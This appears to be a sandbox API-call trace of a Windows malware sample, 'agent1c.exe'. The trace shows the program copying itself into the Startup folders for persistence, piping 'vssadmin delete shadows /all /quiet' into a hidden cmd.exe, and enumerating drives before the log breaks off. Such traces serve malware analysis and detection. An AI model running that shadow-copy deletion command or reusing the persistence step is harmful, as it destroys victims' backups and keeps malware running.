[0030.870] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.870] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x625938 [0030.870] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.870] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x6258e8 [0030.870] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.870] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.871] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.871] lstrlenW (lpString="kernel32.dll") returned 12 [0030.871] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0030.871] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.871] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6258e8 | out: hHeap=0x5f0000) returned 1 [0030.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0030.871] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0030.877] ReadFile (in: hFile=0xe4, lpBuffer=0x20e0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.888] WriteFile (in: hFile=0xe8, lpBuffer=0x20e0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.891] ReadFile (in: hFile=0xe4, lpBuffer=0x20e0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0030.891] CloseHandle (hObject=0xe8) returned 1 [0030.892] CloseHandle (hObject=0xe4) returned 1 [0030.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.892] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x6258e8 [0030.892] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.892] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x625938 [0030.892] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.892] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.892] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.892] lstrlenW (lpString="kernel32.dll") returned 12 [0030.892] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0030.892] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.892] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6258e8 | out: hHeap=0x5f0000) returned 1 [0030.892] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x20e0020 | out: hHeap=0x5f0000) returned 1 [0030.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x64d440 [0030.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x65d448 [0030.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.897] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x6258e8 [0030.897] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6258e8, Size=0x40) returned 0x626a40 [0030.897] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626a40, Size=0x80) returned 0x64b458 [0030.897] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x627bb8 [0030.897] lstrlenW (lpString="") returned 0 [0030.897] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8c) returned 0x627cc0 [0030.897] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0030.897] RegQueryValueExW (in: hKey=0xe4, lpValueName="Common Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x65d448, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x78) returned 0x0 [0030.897] RegCloseKey (hKey=0xe4) returned 0x0 [0030.897] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627cc0 | out: hHeap=0x5f0000) returned 1 [0030.897] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0030.897] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.897] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627bb8 | out: hHeap=0x5f0000) returned 1 [0030.897] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe", lpDst=0x64d440, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe") returned 0x49 [0030.897] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d448 | out: hHeap=0x5f0000) returned 1 [0030.897] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64d440 | out: hHeap=0x5f0000) returned 1 [0030.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x100000) returned 0x20e0020 [0030.897] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.898] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x6258e8 [0030.898] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.898] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x625938 [0030.898] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.898] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.898] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.898] lstrlenW (lpString="kernel32.dll") returned 12 [0030.898] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6258e8 | out: hHeap=0x5f0000) returned 1 [0030.898] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.898] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0030.898] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\agent1c.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\agent1c.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0030.898] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\agent1c.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\agent1c.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe8 [0030.901] ReadFile (in: hFile=0xe4, lpBuffer=0x20e0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.912] WriteFile (in: hFile=0xe8, lpBuffer=0x20e0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0030.914] ReadFile (in: hFile=0xe4, lpBuffer=0x20e0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20e0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0030.914] CloseHandle (hObject=0xe8) returned 1 [0030.915] CloseHandle (hObject=0xe4) returned 1 [0030.915] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.915] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x625938 [0030.915] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.915] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x6258e8 [0030.915] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0030.915] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0030.915] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0030.915] lstrlenW (lpString="kernel32.dll") returned 12 [0030.916] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6258e8 | out: hHeap=0x5f0000) returned 1 [0030.916] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0030.916] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x625938 | out: hHeap=0x5f0000) returned 1 [0030.916] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x20e0020 | out: hHeap=0x5f0000) returned 1 [0030.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62b430 | out: hHeap=0x5f0000) returned 1 [0030.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x63b438 | out: hHeap=0x5f0000) returned 1 [0030.920] lstrlenW (lpString="%windir%\\System32") returned 17 [0030.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6269b0 | out: hHeap=0x5f0000) returned 1 [0030.920] lstrlenW (lpString="%appdata%") returned 9 [0030.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6043a0 | out: hHeap=0x5f0000) returned 1 [0030.920] lstrlenW (lpString="%sh(Startup)%") returned 13 [0030.920] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604378 | out: hHeap=0x5f0000) returned 1 [0030.920] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0030.921] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6269f8 | out: hHeap=0x5f0000) returned 1 [0030.921] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x604378 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604378, Size=0x40) returned 0x6269f8 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6269f8, Size=0x80) returned 0x64b458 [0030.921] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x604378 [0030.921] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x1fffc) returned 0x62b430 [0030.921] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x64d440 [0030.921] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xfffe) returned 0x65d448 [0030.921] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a38 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a38, Size=0x20) returned 0x6043a0 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6043a0, Size=0x40) returned 0x6269f8 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6269f8, Size=0x80) returned 0x64b4e0 [0030.921] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b4e0, Size=0x100) returned 0x627bb8 [0030.921] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0030.921] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x627bb8 | out: hHeap=0x5f0000) returned 1 [0030.921] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x64d440, nSize=0x7fff | out: lpDst="C:\\Windows\\system32\\cmd.exe") returned 0x1c [0030.921] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x65d448 | out: hHeap=0x5f0000) returned 1 [0030.921] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64d440 | out: hHeap=0x5f0000) returned 1 [0030.921] CreatePipe (in: hReadPipe=0x18fd58, hWritePipe=0x18fd5c, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fd58*=0xe8, hWritePipe=0x18fd5c*=0xec) returned 1 [0030.922] CreatePipe (in: hReadPipe=0x18fdc8, hWritePipe=0x18fdcc, lpPipeAttributes=0x18fd48, nSize=0x0 | out: hReadPipe=0x18fdc8*=0xf0, hWritePipe=0x18fdcc*=0xf4) returned 1 [0030.922] SetHandleInformation (hObject=0xec, dwMask=0x1, dwFlags=0x0) returned 1 [0030.922] SetHandleInformation (hObject=0xf0, dwMask=0x1, dwFlags=0x0) returned 1 [0030.922] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18fd68*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xe8, hStdOutput=0xf4, hStdError=0xf4), lpProcessInformation=0x18fdb8 | out: lpCommandLine=0x0, lpProcessInformation=0x18fdb8*(hProcess=0xfc, hThread=0xf8, dwProcessId=0xa84, dwThreadId=0xa88)) returned 1 [0031.107] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.107] WriteFile (in: hFile=0xec, lpBuffer=0x64b458*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x18fd64, lpOverlapped=0x0 | out: lpBuffer=0x64b458*, lpNumberOfBytesWritten=0x18fd64*=0x41, lpOverlapped=0x0) returned 1 [0031.107] CloseHandle (hObject=0xfc) returned 1 [0031.107] CloseHandle (hObject=0xf8) returned 1 [0031.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x62b430 | out: hHeap=0x5f0000) returned 1 [0031.107] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0031.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x64b458 | out: hHeap=0x5f0000) returned 1 [0031.107] lstrlenW (lpString="%comspec%") returned 9 [0031.107] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x604378 | out: hHeap=0x5f0000) returned 1 [0031.107] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xf8 [0031.108] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x624a38 [0031.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a710, lpParameter=0x624a38, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0031.109] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x6047b0 [0031.109] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x4098e0, lpParameter=0x6047b0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x104 [0031.109] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a50 [0031.109] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a50, Size=0x20) returned 0x604378 [0031.109] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604378, Size=0x40) returned 0x6269f8 [0031.109] lstrlenW (lpString="ABCDEFGHIJKLMNOPQRSTUVWXYZ") returned 26 [0031.109] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xd0) returned 0x627c30 [0031.109] GetLogicalDrives () returned 0x4 [0031.109] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10014) returned 0x62b430 [0031.109] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a50 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x624a50, Size=0x20) returned 0x604378 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604378, Size=0x40) returned 0x626a88 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x626a88, Size=0x80) returned 0x64b458 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x64b458, Size=0x100) returned 0x6291a0 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x200) returned 0x6291a0 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x400) returned 0x6291a0 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x800) returned 0x6297b8 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6297b8, Size=0x1000) returned 0x63b450 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10000) returned 0x64d440 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x624a50 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x624b28 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604758 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x624b40 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x4) returned 0x604768 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624b58 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604768, Size=0x8) returned 0x604768 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624b70 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604768, Size=0x10) returned 0x604720 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624b88 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624ba0 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x604720, Size=0x20) returned 0x627ab8 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624bb8 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x604768 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x624bd0 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x624be8 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x627ab8, Size=0x40) returned 0x6252e0 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x624c00 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x624c18 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x624c30 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x624c48 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624c60 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624c78 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x625328 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624c90 [0031.110] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6252e0, Size=0x80) returned 0x6291a0 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624ca8 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624cc0 [0031.110] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624cd8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x624cf0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6297d0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x6297e8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629800 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x604720 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629818 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629830 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629848 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629860 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629878 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629890 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x6298a8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6298c0 [0031.111] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x100) returned 0x6291a0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6298d8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6298f0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629908 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x629920 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629938 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629950 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x604730 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629968 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629980 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629998 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x6) returned 0x627ab8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6299b0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6299c8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x627ac8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6299e0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x6299f8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xc) returned 0x629a10 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629a28 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629a40 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629a58 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xe) returned 0x629a70 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629a88 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x10) returned 0x629aa0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629ab8 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629ad0 [0031.111] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629ae8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b00 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x627ad8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b18 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b30 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b48 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b60 [0031.112] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x6291a0, Size=0x200) returned 0x6291a0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b78 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0x8) returned 0x6252e0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629b90 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629bd0 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 0x629be8 [0031.112] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x0, Size=0xa) returned 